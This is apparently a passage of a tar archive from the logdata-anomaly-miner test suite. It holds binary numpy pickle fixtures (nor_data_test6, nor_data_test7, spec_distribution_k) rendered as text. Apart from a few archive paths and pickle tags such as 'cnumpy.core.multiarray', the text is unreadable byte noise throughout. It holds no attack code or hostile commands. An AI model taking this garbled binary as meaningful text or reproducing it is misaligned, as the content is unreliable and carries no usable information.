G?1G?":5ЧG?R}}GKv|G8-GLǡG?yO6LG?WJG7H.G?DnlG?unSEuG?yqG? 9/wNG\rJ+G? XRG?K &1G k,G?DJ`=G?ȹ(G?E$ GD@%*G?P+r$G~G?V=*G?BWG3G?SrXyGo pG?>UB'GG?Y vGR eG?-bG?L)3jGD!kG爵۷G?XInwGۺ܏G?(/G?ja|G]G&_VG?R`(,G?$}ȝ]G?)G^#:]G?G)Q掞G8+:Grh|aGHwKGc%G?OjG?ɋ"|GwGmbmG? G? r/G?B_G&/G$يtGLFHG%rvGOG? h"G?L`G?惽:^UGS G[2brG? `GM!#G'@NE4G?ޢ61WGd+Gũ75Gᒐ <@G*G?0嗴Gv-g G瞫 GB$G?]Y6*sG7KG?5h.G?א;}SOGyFG?\+G?%hӂG _G?JyG?JdG?<CGG?<>vG,vVm`G>+G?Dtm}>G?ع\ˈG?#c$G?MժLG?c| GlY=FG痯iQG?-G`Gs3G?c`o5>G?Eo{PG?+GOG~YiI_GxBmsG?SBNrG?ڷfxEGZ*zGE|TGǻi?@G6[iGcq+G?(G?GG?Ր`|SGՉ@%&qGk329G?v|3G?G?vn 'G?{HG?ع]tGGG.G(mGOZG?CxKG[f!Gx0G?Olj%G?߫9:G?޷]7G?1|#G ;!9G?)TG(?!GzֿEG?ikDG? 
G?30G?,ꭉGnPGP"^GFFr9G?~8G;G3xgG?uu&QG?e^ G恀Glg\GKRG?_qG-.gGkWyG?jCG?bTIGρXqG=8t8G O5G~I20G?`G}AG% G?DŽG?LE^G?-hcG?>ҸG^>GT)ψG<6G@R$GfG?J!G'=÷BGݻ4AGsyG?6вGw83GN)G?yG 8îG?{DG@/G?K@DGlDnG좳ՊG?xD kgG޲=aG dG@'#GŚ,cG_bd#GS G;9kyG?#!j-G{3G?&>@GΊdG?qiqG?MGY@&G@5jG[=G?*s&)G?>)G!&DpnG\G? 8ywGG❆ =G?>/GT+GpcGz߈;G?njG?:/G?|vG?Z@G?xG?찧G|QyGGiG~UrKGuG?3FhG¥VuGfG#*GTmG@5|G%1h|GA[DGt~m1uGq~RG?4]ʼ9GɀXNE G?㜟NG?m7/.G9\PGR Ga8{IG?OGJG?ڰT\@G8qG}RX;G64VG? -fG{n.GBG?ԕ`G?ڊ^ [G?08GG?38G1 a;G? VŽG-<){G?BGG;G?D&wG^p =GܫfG?_PƠGT[G?QȖYGg^G?|P֊G?G?z?6]G?aHGGؤ G{GQkG?DJ!G~GL )G\+G@ sG? qG3YGmAgG?+9G)%G?"_6G2NG? PG7"DjG?NH!GvG?$f_pG.GYe(G?0- G%G? ůGcw[$GYjG*5GG%fNVgG?{¯!KG?|l9G>܅=G?Қj?>/TG+NdGVjGӴmsތG?ȼcЁ Gّ4mIfG eG?%Z>G?qYQGGŝ@o9tGWX(GLdNG?3F%VG?8ܞGZ>G?їcRG|HG?*MG?Z8FG?kG?_G8 EG+4{mG?gVNLkGd4٢G??eG?ĩWG?&UGի(WzG?܋:6[G?i*vS+G?nqG?IUG?!"KG?PۣG?r\>Gvv@Gg[^G?}G?}_"G?@G{ZCA}G?Lʊ`G? =ؐG?` XgG?_fiG?ۘ'"Gx;rXGIY>G?@ʵG?[G?ㄨ1daG?tiHiG?ogN%G?ȱG?IZ9˒G?4K%įGO}$dGr>!GG?ꙡKJG,G? (uBG?oҞEQG?j)KU#G?Y*5]GvG )G7 ~G?\$G/G?[G@qG?&,@G?kW'G?]G󦿥VGR+XG?,fJG?Z^%GT`G?w3GxHQaG?LjF`GUG pGڕ'GGoG?)G?#PaG?殉yG?CqwdGbG?thrGf&M\.G?FGGߙ0WG3)GyG?;uGQSôG;Gv iUG?بi]G?xKG9oG?gG/cG? G@2*G?<"G?;g4G‎G5/G?7NJG?fG?m^SG G }'G??+G?cjN G?繁G?G|!G?CIWG2pߍG" G`gG?СwuG?&Wn9Gف 1GP8]+GEG?G?3:YG?x"cG?Z2y1uG䀨Ԭ6GNyGé6G?ؘb靻G?H%Gv G(8WG?_YHG?%G֛H~G+GljG?x1`G}̔G?t;GVrG?,+~G!G?͛@ϼGd AG?<#$GZծG?f13AG O{G@ZOHG?jGᥥg7G?0qGr"TG?Ԝ؀G"BZG?Q̌/G=wΖuG@N7[hG 7G@5:GyGWuGDG?79Gt M+G? ET(G]G? G?ԏd[G?F~ԈG熋|ŪOG?")"TtG?% G?S8.=vG?-fG?jGѻVyG&G?Ҋ~0kG?%dG?{ G? ٓlG?g%G?yt|EG?)ⶉEG GӚ&VGvqG.'DڸNG.G?8DEG?ѯWG? G?:wSG施F|G?Jz8?G?V4UGO"~G.[GM^zkG?G^lXxG?quGf+)Gȑ{G?;YG?@mGpBG? 4,C4G7.G?o!tG_^b*G?8 z4MG8\X6G?xl9`G?R?3?G? G?s{PGG?G?)lfHG?pK& G?1ȌG 鎒G?;GP* G?k`fG?kG?1hkwU7G9GទzG?߁Ţ9GzG?%zG⿧ 'G? 8G?( GsG?"3˾2G^]XG(GR[GR6G?k RnoLG+e GevG?0G?lC٪ZG[M`hG$INnGzG%^? GDG@3\G!PڿG?1oG&4G?ڭleG?VIPGI2 >G? 
DG7lcG?2^GG?;G?]ؚ=G%(_4G؃; G kGިw€G^I7GKoG?;jG℅5G?qlG?}9@G?CͯG 5GQGjА{G?˙G?ܜѲoG?BG%|G?%eyG?@ +G3ҕGwӏG5G?b,Gْd )"GLդGťG'GF\=G$G?y:R G?$rX)GK1EGvG6=@GP0]Gy"GToZG[n?GUӛG?h~lZG?|GύحGAn~VG?DvMG }dG?fNG?'3G= G}~ok,G?pG?cG?hq)_AG?^GRG?ʢzWG4Q;G?X`GDG?!G?tqG?=a\G]2RG纰'G?8/G?*GT;{)|G?HfG?ňG?COMG`sBG/{`GG?7fGGw"wUWG?|[ Gց},G?;>G?{* G?/ G?iG?Ku#^(G3LFG?UYGMpG?~W@G?jZyG?ҡyG?]+n\Gy|EsG?6pBkGumGa#+/GroGG?4p dG?^mGD߱/MG? G?&ofGd<5&:G? 㜄TG?JG?IG@YM;G<3G?˛G6lnG?ꖊvρGWZ%G?ܣP8&GܨtyG?-G?Mx;G;17G?zG?\GYkGFG?_s(GG?C!nGzK(*Gt W=GҹR>G?qe G?σ“G881G? 4'G?ṢGr ^G?0=VG?;R͡G[5@G̪hG?cbXLG?t0, 7GP.G;z3MGCGuG?x^JG?8qzG?ѵ]G > G?X!G<eGp_vG?B>TGY6G?ҼlGZ'>G? ̇eGR=9G?vG?jG?`%λGP/RG7c*G?_ $GG?$TlG?(zG?mGsd@G?_wG?lpUG?KmdGoW5G2G^?GY8JG?=nGa{u"G{BG?`IGߥsMHGw!iW{^G?">%-MGڔaTG?N@G?o]PG?.}Gۙ-Go5G? 6}e~G?x*/G?e=HG?s:<;G.G?_qCaG?V(˾G⅀MG?"JBG?2eG? GشCf^=GOG?&fG?PX[G?ZG?;+}G?.&z qG& iG?68XyG_PG?LG:GS޻MG?tRG?<.O6GCtG??0eG?/6GKjG3;FeGCG]BG<G!GxWG?0G? G?*8,#,G`._G۳")G? SG?lrG?QϭG?E"Geq!GyG+ͤdG?CeJGfGco0G?_@ёG?+e>G?<9Gk=cG@^u~GwG?Ӳ'Go2G??GeG*FG?CNPG@6qG?KhwG]OSG?88!G@km{GzͫG? G#G?T KG8GcyG߾TG?ݶ3QS|G?*‡/G?P\G?.yG8ߌG?@a&G"f{G?X«/G񊫃 G cjG?d2G? G?MGes;G $Z$G9GV,Vٸ>GA%G?AϢHG?03G?&UPGy~SG-!QG: G?ZCGGG?[G| G?QG0GǴkGK/GG?w5XG?^{GB0QG? bG?x]QG3205G? 
G?kN|sG7fEe](KKKKKKKKKKKKKKKKKKKKe](KKKKKKKKKKKKKKKKKKKKee.logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/vtd_data/nor_data_test6000066400000000000000000000046301437606560100273250ustar00rootroot00000000000000]q(cnumpy.core.multiarray scalar qcnumpy dtype qXf8qKKqRq(KXq?Rq@hhC;oL?qAqBRqChhCM~' r?qDqERqFhhCBUQwqGqHRqIhhC(FJ?qJqKRqLhhCy~ @qMqNRqOhhCO_?qPqQRqRhhC3y0'ӿqSqTRqUhhCz?qVqWRqXhhC* qYqZRq[hhC<'ڿq\q]Rq^hhCmiv?q_q`RqahhC8@E޿qbqcRqdhhCY~غ-jڿqeqfRqghhC?'KqhqiRqjhhC|v?qkqlRqmhhCmҴ?qnqoRqphhCo?qqqrRqshhC%-"?qtquRqvhhC$zC?qwqxRqyhhC9h-?qzq{Rq|hhCBZ0'Nſq}q~RqhhC0k+jǿqqRqhhCVn#?qqRqhhC4?qqRqhhCQnʒqqRqhhC檔jqqRqhhC:p?qqRqhhCjq$qqRqhhC{qqRqhhCaC(qqRqhhCuj\qqRqhhC6Z?FqqRqhhC#dnqqRqhhCB]'&\?qqRqhhCJiɯۿqqRqhhC3qqRqhhCy?qqRqhhCX*ſqqRqhhC wqqRqhhC0:(sqqRqhhCTVkqqRqhhC{L?qqRqhhCxqqRqhhC{zjq†qRqhhC95qņqRqhhC*:-qȆqRqhhC^?qˆqRqhhClp?}qΆqRqhhC7MqцqRqhhCY qԆqRqhhCwYNq׆qRqhhCM̍?qچqRqhhC?q݆qRqhhCN?qqRqhhC}M/o?qqRqhhCR>ĿqqRqhhC%ڊqqRqhhCa6/?qqRqhhC|8Vo?qqRqhhC Y?qqRqhhC`?qqRqhhCbxZ ?qqRqhhCtL9+qqRqhhC+s{qqRrhhCҫ4@rrRrhhC')&rrRrhhC+bLLɿrrRr hhC@C{Կr r Rr hhC!vBr rRrhhC/Š~*rrRrhhCrrRrhhC ?rrRrhhC?$T?rrRrhhC ?rrRrhhC$L@rr Rr!hhCH1+??r"r#Rr$hhC̷&?r%r&Rr'hhCr(r)Rr*hhC[>u@?r+r,Rr-hhC쳚?r.r/Rr0hhCPVr1r2Rr3e.logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/vtd_data/nor_data_test7000066400000000000000000000647021437606560100273340ustar00rootroot00000000000000i](](GyWQG$@9G?W66GiG? PGTGH:uG?z&˲G&[}G>, G?7̇ G?G?`[;G???jcGNG?햚'G?^7F.Gw-5G3 G,:Gՠ]PG?ѮG?RGtHT/G?ǟ Gʕ>nG-tL'GG?)$GU tG?d]=O1G?y,׵GnغGSG?bAG?|-ͶGA)G#w%*GpDG?$'G?ʲGw~Gӊy`G?mGgG?s&6G?גkGn0G?>G?7Gs6ɵCG?TtrNG?<)GG?jAtG?lIG\HpGǡG-GݧG?GrG?PIQG?dFQG?GѷT=D QG?qGg RmRGԾ܋$HG@fubVG?\6V G|G?u%G?eX G?l)$y\G̳}.GhdG?#tGG?۱&G@RxYwG?⵫1"GƱ TxG?XAGݰ'[G .G1'G??x5GE|F(G?XN 8G?;@sG7LGˀV=G6Rc Q G?K2G/*QG.VG?:G"HGUsGG?(@Gʵ诞pGFEk G?¡UGlG@ ,)eG?_GKyoG?KL+~G?”DG?O/vCGrwkG?!lVvGG?Ϲ~"G?3L%G?G?_GG?ܭ[GsH߽G?a<G?GCGn¬G?ñ3"G?ݔuG ؞GZj=|0G hG?+{kGҦG@)5G? 
q"G?ұG% #\5PGn}G>G?GG?}U ;G?ټG+* GVRtaG?=9G?ȷH x[G2%߫?GЩEGsjgOG?1;RG1&MޯG?;k G˨%>&G=:GgG?IKs"G?4F5xGU~G?XF_ G?aā]G!-$tGe.pG ]čG?\7jG6GGR4 GV ~ƙcG?Y)6 G?`懤G=D;RG?¤U.G?{!G7 5բGV&>G?,` 9G?UUvG?Q?CGN$FG?{זG?v{OGG G?`SviG?6(m G?vClG?GKն,GK+G\G?pMGZN1G1LG?87Gt:)GSQ]SPGƚf*GwYFGv!GawSl%Gސ ^G?¹ G?)3 G>ر-G"bGrvaG~]G2:~G FkCG.G`KwvG?gazGJLGtaߵG^cG?̣>[cGSGTaG@֛GcE.G?Ij G"GJSDyG#dPG'Rg#G? \A/G G?](zG?~QvOG={cw8GOf]`;G?nªSKG|+G?UGjY?G@CQTG h|{G8FdHaG?<@>G?ԍU<<^GĦ#G?hJxG?9rGڷ|GG? mGuGG?ǣGÓK^Ξ;G?'zG?-RyGRRG=GfZG r#TG??lGLPyLG?IGG5+]G?"/0G?4G?GFzG?WvG?kۦG>hQG=,.GpG?`GȃԻYGi&GB@5!eG6GHG?,ލyG@CG?G莩ZUG?MLGY L]G?ʉG?2, G?evG?⍭wb=G]GO 7ѰG?_$(nmG? koGD JGs/$GzG?b1GTUGCM|G?-A0G}UV G?WGhڌG~Gev5GZΈYG?+|t:G? \G?[ GEs>G?KeG^_GΰG?)mG?ʈPGB)GܕrLsGש-G4_D@G? LqG?=2G3QXG?b0IGߝHx GT}q G?xSt/G?悉L7GCCp%tGFqGxZ`G$4|GS)a[GƓDyG?CpGz{GR sG4pG?4i4@G?;*kG?DT*G?3p|6Go:G{(>G?4,:G?ɟOG?AG?ٿ-ƹG֠Yq\G?kGHG?B=G#v*IGx:cG?^)Gz3(G?9tG?lо7G2ŃG?Ȅ`CGG)TeG?`Nq4GjG?פ]%GɝQGG?ޜG?1RG@x4_!G? rXG?77 mGC7G4dG{G?pXG?0mWkGR6ƀG?}OG?qH:3*GTVUG?QnG?%yG?ZIVG?磑!IG0WGԿ\{G?cm/G? ]s7G?5&A%G_JYG?! RG?)AG?۩P\G?q9Gy1GĎc1GB|G?ddG?₵G86GYWRMnG?uS G@5;L0Gd3ftG-.bG?$rG?I6;G?ЂnGX'Gr˜cGPNNG?WGvtEG?=5 G?lJG a\=G}7GكqGElGЖOX}:G?cNQ8G-O]fG뵁G?ggMaG?w^-WG?g AGh""+GyT$%G%+GIDG?xI :G?64'GŠZ$(G?.>G?E=hG?鳁XdG?ٔBRG 6TG?KhG?bXG GʖS(Gd}3}G^}G|١G?׈pCPG?UGQG?G_78d5)GKIЉG,UG?ҽI GsG?̟zG? wGcGۓjG?WiUtG*UV8GW?@w G K2GGG?/s G{GWG@MIf{G?G G?J]I6cG[D[G?H|CG?y5GoչrG/4 GS^ GLR PGM0GhG@ 1!GAYsv]Gy*`G۝cG[څ[jG2K½G?6G)QG@.IjG}~UAG G? 
G+wذG?LqG?-&WGH2G?o9uG6l)>IG?nʡG ޢG&HGʬG?C@$bG?$YG?Z[G?eGKɅG\;aG?MG@Y6Gb*\1}G%;g\G"$ZG?aUG?孆G?^НG͞+*rG?I'&G?PGt(_N1GHG?sd}G@G?zQa/GeݢG?o2#4a`G?DM'G6bG|G@G?%G5 tGͼ;SǰGbG %[Gx;`~G@=~0G-A+ё~G?ՄPG;ryGܤ-Gǿ]GmGGs !=G?Q%rG?G@WCG G?ar,G?'IuG Pt%G?ZxG?%G١ -GG?K˃Gî1G?WSJ|G?` G?y#үeG?9 eG?GUjG?^$1aG^-G?@+SxG?4Q G?[;G?oJGԵeYGGԓk GҽmG?^蟭iG?3$l#G?΀?G@KiG?֧FC{G?MGG?l/GtFGӌT GCN rG?\Ĺ]jG"pG?.-G?½GܝRGJCG?-JbG?IͮӔGޓL G?ǃ_:G #ۖGח G?<@G?|ұ8!G:d$G?IG?eG?0 WPUGӰ\ɞ)G?܈wG?BKG?"R[AG!G?ܢk=?G7BBGEG2@G?-BG?چ=s:GG1Gsd-1G?NUGGbϻG?ZѭG?`(G?j̞G?ũ6Gre#%G?kgu/&G&^G?dT!GF4d9G2 BG?䄹`G&GI ?!G?3d oK Gƈ!jުG}~LG[г G?ǃGboYG?~1eXG?ِ%,rG]4G?7%#^GC2.sG?tWrG z1^G?z#G?1bLG?ܤ&G?$|8G?70hG?RR pG?qoA]5G? :bFpG?zSQzG?&iG?P~G =GG皠٘#G?Тb😉G?@r!GMܢĬIG?2qmGߔ'7G<}G-CG?,GGS-G?pTG?=mG?̱?bG却RQiG@\FGsNsEGRD7Gϣ1G]"gGƶ?TG?`* fGrS2CG?:@GX}GlNG?pcGG?3fTG?kyօGbG1G?jG譧GAf~AG?i!:G l GU5ʼG?|G?EY'GPIG#&şGe\G?kyG?'!tG?§:Gȅg8G@0r G?1EGHOG+oG,x_G1/&Gxn'Gwd5Gю}Gx.G?%@G?L!z)G?㴬4qGZHCOGگG{GiG&wnG?[0GdG?t@0GX7HGAHlG- G?X {G?!ǝgG@ G?y٤oGp[G-DrG?/!G?m3Gp"orGH%sCG@&ujGi(G"\@G?1(OGܚo2G6G7qxG lG@lhiGnw/G7G 0G?MY+G]3/EGsGy VG?7;/dgG>D(G?0+}GhsG? "Q-G?ٺ1 TvGlʩG?]*\X G&GGERG?΃:!Gb G?9NGd>GG;BG?eMG?OG?t4GcrG?dG?plG?*{&G?Osj?GAYG29G?`rh͒G@CAG?!7kFG=b]G?S5GA<@G/4 GH!G?*$TXG?DEWGJGS@G?QG?j4Ғ G?ONG?zpG>*#G?HNW_I7GfJ_G?'T&G@>G: Gj+G4GS#GеtGstА/G?؜=G̎GEV!OGшG?Ѓ;+G?sG@4_#|G? f>-G?3,>GweGmN2G7EG?ֶ onGiECEG?y%XP\G?G'YG?6AnG?pG?lGQG?2GA4TݸGaG?#)iGO]G?:)$.G?,4G? U|AGA(G@tI2UG?H5EG; ݢG6o0G?pb?G聯`GqhQG?GJG?xF&bG?9Ҭw'G?d)ߑ+GrJG?N1KGR#G?YG?$)n~GlxhGGڬG?r'G?[@G6@2RvG?ޏ)G?ywGJ3RڎG?j567G?19qGkS IG?9$b̄G?t1G+G?`q|G?ֺ_J:G|hoGI)ߚG}#>BdG?k-G?=G?ٍ T}G?2G?+G--bG?9iGs``x*G?DG?3\^G?ĊBtG bG7TG?I G?cFMG/`Gpz:G?ʽzGCXLG@Y[FGGGiiCGvɱFG~1)xG?Rf=G?i_HG]~/G?D'ݎG?F&G?nhW)6aG@ߔe(G4WfG \G )GXچTGёR0yG?$"+nGޫG?Q}G? *G'G?hGdݩ9G)G%վcGaK_G]#G?9GtpG?XGvGGk۟(y5Gj#G?a~B G?wgKGnGdCG?%/GӚ92Ghx]G?ՊnN'Gw|nG?zu@G`'2ChG?`)2G?[3GڎEaGOdG? UuCGĂ4G?NPkGOG?LjR˥G?ngG>QG33rrG!G?NT:GG?]ڐG?nG֟I8rIG@_G:nN(G?%iGۥ@!GFFJGsG?+ 7}GG?$G?ᮢaG?IGЄVCG?L<%Gv6GQu#\GtzI;GfQG?,CG?,#G? 
G?ӿG&G?ɲsMG?7G?}1G?~h,́G̊ÛGwG?% gG?3"UG?UWSG%(^G?VG?ݎ]G?.:G?FzWG:֪GCG?[GԺGqyH]G@*}y\G&WތGQ4G?/zlwG?80iG?zmc{G?~8GӸOĀG|PG? LG?=8G?@G4~FGQ.]DG?''`G??G?(GH5FObrG' aG?GG?q_uG-3"GB@s^G,G?v0GG?BKہ3G?ܰyGHw[G?)/SG?2ng/G?ϙZ@G9G5ϳG G?C޷G?!voGi4:G?TG(EJG?{m~aG?9VGGѥ@GSJG?̇Gm$G֛hG?嶎$ G?ꝨfG?*}CG?ZMNG?LvgG?F"'GؙjDSGC~mKGuwG?Ԛ[,G?H.G3$ ^G]G Gs֌жGCG8_n:G?JI{G㊌G?y("=cGIօpG?iG@K2G?-GF7jG?[OG9GPG?܏GHYG?vѨG&Y'G+dr-G; G?G?lj9jG6XG?7LcGsG?0#"G?%AtgG`}Q3G?ހ G?@'7xG?CvG?E Gd:G?ȳG?\kG?>ޥRGڢpGw&DG?q,#|G?[_G@zG?ϙ86WG28G?*G?߄U5zG2;2uG-whG?gٲٖGPAM۪G?\gG@G?QGvAGrN ƍGcCsGBY|֣G?,,~ޫG-G9{sG? qm)8G&6G?F; GSFGV/9G?+ G?>BG?c[[SG?:NG?mq~G엎KG?ߏGQ@G?s!\QG?tlFAG?ߊj]G?/GOG̋İz7G?I9YG?3G??5dGHGhIG?o3GJ`kGm9uG?)sG?LJJGyn GQ]G.ŦeG?|G?!> G?UG?JeGpG?vyZG]@G?OM@G?iZG?8H$ tG8*GS|G¼so+gG GXF^$G?ЩGUa\G?gXG?#WGG?|]PG?GOOG?>+GJskG\G<3G?+NG+]ėGnܡOG?@lEG'G?u_-EG?EvG,G|2KBG?3gLGQtKG?^MG] 6G~D.eG?k4t&}GGj.4ɂGK=LG?J4ebG?󆃊w_G?2unG?ݨ1GYmG?ޠWkG=ϹK-GM]NGp*GG@P[]aG?<KG2k\.G?뭡@;7G@:~df6G?$/6G_ G? s[?&KG?r.CG?@zf]G?WSG=~G?iG|M(G?"A<G?@@G3 G?3k!b Gڄ.{GbǠCG^1VsG`BaGB'2G!IGeG?бlG*HG?pMI}G?qAIG@'G?ض tG黳ݩoG?~JWG?.?zG ƶ G?Rm#G p0wG?OsqG cG?3@G@j"G?I*G?dzORG?M']RG?ꎣ$4IG?9 FG?%krGh^GKnGws-G@N_G%% NG?ߞ+4G?bG;1ueuG?߀(G?Ҍ0'G?sYGߕEAG?ؓPFG.ȩ?TG?`R8G?T G?֓hGe8 G?Ϣs5GftG@I>>G^G?6G$AzGw\}5 G3G?:"GΈNG\c:pG?xGf "G?kzWGBG?3OG:o(p^G?&>*EG?ᘪsG?KGD6GxUGSӈ*YG?.AGνGȸG/ Gھ.JeG?ÃwܤG8ZaG+SˆG?| OG?$,G0_zSG?єyT G?ǿeAGu˨jm"G?HG_PG?4NϒG?5'G ݛ"GZ>G?FY_G?i@d)GiBAGĞRGGcG?'YG9G@S7&G?b|iG۝5G?R\G?dGٍԜ,GG։0Gq5G?G?ǴG)G?'0V^#G?jv"G?$G?xojG? {5G?_y SG^MG?Xt&G|PkG? $5tZG I,̬GAg"4G٢bŏG?BG?^ $G?[D8HG> GcKYG uעGļnG? ηgGη/G[y~G?ZuG?TF=G?4W*G5-ClG#vzGUG#شG?cGAbGkӑpG?ߦJxG?sW}4GG?!wrG?YE"G??<GǁcG*G?Z2aG?Mϛ,GΌG?qF5GGG>9 G?b<G?m Gո"~~G?kG?s sG?}e^G??GG8hdGsN6AG?'G?u dmG?]{Gve) G}G?X ^VG? ɎG?ȣSgHG.MnG*^%)G 'G?טoGbuӳG?jzG`g3G?ikXG?{:nGQG.FGTI[eG?A%G 4CG?@dG?3ӄ.G?%UG?zjt-GFAG% ޯNG?CG_AջJG?q^G?L fGY#/kG鿖FG?5吰XG?GFx~G+>GdyDGώGSD!G.5G?᤹dܰG?i}2?TG?Q WG⻲)NxG?P)2G?ʖYOG?Ӧ%GGءRGۦG YʪG zG=%G? ©AG+h! G?;-o1G 5GuG5ciG@XYGIgwG?Q;G@ RG? 
qG?LxG wz"G  ٙG  Gi/G?ݷ82G?;9~Gծ {G?6zG?7;QGG1G@6Rr۔2G_G?<#^G?fG~iG8rG6?ZGD񔁵G? {G?5ޫdGcBG?ĈsYGcڃ4G?پ=G?=W!GwގGRrGH㳉G80G?C4GT3可5GۄzqWG?YwG?e G?/GGتG?ԯQGxcXG?Ӗ8B%dTG?PG?Y\EG?LVkG?=QG_.UAGsyóG?xzq G?U4ǷG?7@bG?e;G? M%G}G?@wkG\9G:әڡG?O;\˄G?-u?G;\wG@ioGtG!MG?ZX1G?wJG?4;WiG*R&(G?厯˓GJ4ؓG?.6nGΎΊG?\GӌeGdw ]G?^{#G?zmRwG?ߴ pGT]rG?&pG?yG?G#-ZGx0G?;G𡉃{G?UeGms͊G,jG?E-[G?LP2 G? (G?Q G?46SG?^0G?IbGg.zڍG?DG?.^JG?F:@GhG?3aTG?Jg~2(Gp GŐ]AG?r2G?|GƉ9O&G?P@9G?نV}=cGBmG?ds.HG?!$.2&Gc`G?uבGSG!nLG?lGXY'ʬG?`%-G?vKG&G?5 /oG*GQ{G+ήG%MgBG?E|Gqd-GxL,;G&?bG;(hG?q G?­!epG?@H͛G::mG?烝G?O_G!()>G?_dG?2WG? nLG?PfK(DG?㻦)ԍG;nG.uG?tڔyG?GVG?ϴG? \2G?K/G뜾G{G?B4GnG?GGΒ pG~]G?v7G;?OG?꠼GE뛲G?KWG9ϣyG@Y:ąG?s_`GZ*?.GohG-C"(G԰>%G/dmNG?e`pvGٲ?G??#G@udtwG19,3GWR@G?`vjG?E -)GP4GYG?ƩG?vGvm~G?hG?E|mc.G?nG6-lQguGl;W_3(GiRG@^GDaVYG-/GG@,X*G?|G{tVGُm!ѵGs G]G [z!2PGu+GOG?d%\G?BXGGY])G?z$z}G?ϬGflTG_bqG?ﲯlXG@B'G?yTuaGjPG?Ѵ7n-G?ñH×G ЖG?KGSVGu G?1wG?x*G̥-,qGмެG?ӪoG?.uG?EUd*^GPF\GuG?)?PG?MG}{+(G?R^G?rFG?uiЊG?A2>fGQG?5&}#d(GG GYjGZ:UG?,~QG?{^%LG?{>G? G?+VޫnGݽ@xfG'dG?tB9G|{GPsG,Q*G?4rG̳U 3G?d)G!aRGcVȃGrАG?uG&VxG?0MG@GhjGӟDFUG?"qGYG?0Gz[G?[NG) G?w G԰HG߿0TtGwzg-G?yp/(G?% (G9G?4pFLG?,K G6zݥ1G <ǃGDG?LDݍG?YѭG?oX]G?qG?[E2G2g;IvG?^|X>G>M "DG?X!lGtGǖO^G?̿44GM3KGGRKZG?>[{i G?G?"ɿ~/GOրG?3yjG?'G?I9G?ozhG?fUGP1RIG,9G} G?Dž+vprG?ŒC=G*OG?6JcG?U%eG֕duYG6{GϘ"ihG?>GVG$EGHm;G+G}ܣG?vGЍGcG?ׁ!eGS*L?xG? zuGזCňOG?dG?uIG?`H)GvfG܂:IaGG?Sd&N}GQ qG? vX~9GTvWG?Xv-RGewkG0*G1@HG!sRGH$_G?섫|bG/IGz뱒'G?ֲB@)GROG CG;]NG}`G?aGMGmthoG?\G?ɌJ\6oGb2 )iG?@G?];BtG$?G?b} G2DG?)5KG<G?&;G#^piG?%..gG?e:_G?ZQ G?{"hG?&}GjٟG?J,p[G?ˬQhG.فNG?4F1GЋ+nG?Y1G@ ywUG?9G?W]lHGȶ.G?SQyGpkGճ[#lG/EG%2sG?fWG?k;G?SaGU&hG\nG@s^JGl|G?kqmG?ʫX'*G䷦8G'ƻ@G?dQGG@sO.U5GrkHۡoG?9G?XNAkG?(F4GȪ+&G?fG?ja~gG?/o=G?ӓioG# G@(G'FG?E1Gp$Gn]G*G7BG?jKEG?s[ b_GzGE.%eGlG?h nUGӮ51GgG9qG?Ӡ8ǏuGw4QG?Չ=G?;cG [G[BG?'áG ZGxPG?)W G?d|G?+3GGB{a=G?6EG?P "x/GL=DrGC$6OeGA?G? G,NG0G{GyQG7i$iGڅ\b *G?eH|VG:5Ba4G?VJG@hGˣ({2G?NJlwG?UGuZGdAJGJHrGbG7aG! 
1G,/j];G?6=}[G?!lGMBRGwO54wG,k7+G@`x U]GXG[@JsGYlG?z02jaG,5Gi<^G?tGGz G4GG D !GG?nI@2GL.OzG?^G?jЋG?'HG1MG-ir@G?ZqdG?ǬG?_gG?(KGЀGȻuahG?A2G?GtG?<6G;9ƨG⢤TG\zaG?ҧe}YGy-G ʄG{iGsGƁk,G?Ny\G < G{dm-6eG?hG?긞.GZd}aG?i$GǚhG?4oGvTGF݃gG?uw'KGw1u'G?*idG@FBCG?MZ.G(fG?םtjG|LqG?^өG?ֈW;GvMeɊG?e.wI=GG?-\L-cG?tR G?)},ǷG@ٲ(oGlI8GF[G?{BvvG?2xGwG?,M*G{ljHGeo )G,uG?+ `G?;%YG鐪GVVGpIG啞SGC@tGj&G՟JG?4Gw'19G?T3 G?%7GY?G?$cG?GtGόHi$G}{0GE Gʣ}`aGI|ReG?)^eG?M=G0UG?EpqG?v,UGɥ:G^Ա~6GKG?̢GYG0G?RtQTG?X޾xG?ȁ[4xG?&GاX؀/GNr GWG@SAG?.-2}G?6yG U̟GG?IsG7bXG G?R^SGDm BGebgG?C`3vG/і4G?k,RpGз!R`1G?V5/G?ctG?,:؁G@Տ GbWnG_i\WGB GЄvG?ᗁNG?SFnG:G?Jc=8Gc*.G?f"B3+G;,`G?OpG?’wGArG5"N%AG?3lG-K"RG@q&G逧qOG?GnNG_7GfG?.2V9G?= G?l$G?ޣ8l3G? PG6$G?X&rG?(=G? +>KH6G?rWG>eG?3WGlG?d-bG*tMG&6FkG?탕ZGc89HGfTG?lT>G?.!GdㄯGuvvG֌ FlG? yG?{ݒ"DG?7rSG? CfwG?z7]G?ejG?ي;>G?RrCyGR"G?J{G?ЀT\G ˇUGڶ&Ge](e](ee.logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/vtd_data/spec_distribution_k000066400000000000000000000177371437606560100304700ustar00rootroot00000000000000cnumpy.core.multiarray _reconstruct qcnumpy ndarray qKqCbqqRq(KMqcnumpy dtype qXf8qKKq Rq (KẌ́g׼YNςV:im\P~7(n2?j#FQE!7g*3pWZcN%)nX ox.aІPjmrs@3TG|:̕!D oՎvG]XQPD9+Z.[* }oA}np-JXcW׮A=q\)1ᕇ$e*$|3 nppDcwW=fJY2G%B9 Q+[ p[s}f *ζ Z󿞮YeM/3@󿾷4Os斏;|+Hvԏm,2ie]q\ RP~C Z7򿞗[*Dj!`H|C Q%}epCNZbWo7Kr$>!@2yF%[ҫbvj4h RD܅4y/SpI8Uh,_:e>SrF,Bd'>񿍚L5H-~w[ nT2k Ϭ/wD];Q^\Q-sE o<3ȉ. ,#)\pvW52!|7s>{Bk;bԊ+VE-IyjA 8:Ns50𿚦Q'LV\Wۉ\? /q?P}"q=Ȋ d￾4R=Ԧ£}\|dWcᅢ{xRFYTA 3.0Ǻw￈kHh%.EJ X@Q&#wSk]Df4\RLSe93~"›wu U(LN*ِ'KىlFΛLe,?z^q1i_QXrG?6&D 0R g47'ۻX y쿨FeniG쿉l쿪 xlm>[.k_JF_9%-1 2.X뿶$v@vE7&Pfk)뿸R[HYd~ o뿼g+^}ALM=wLm<'+̮뿁 뿣Û12꿃L- SFqs^꿈@pւHIqjkX꿌RY?Mz. 4܇ a 꿎e:QF12S 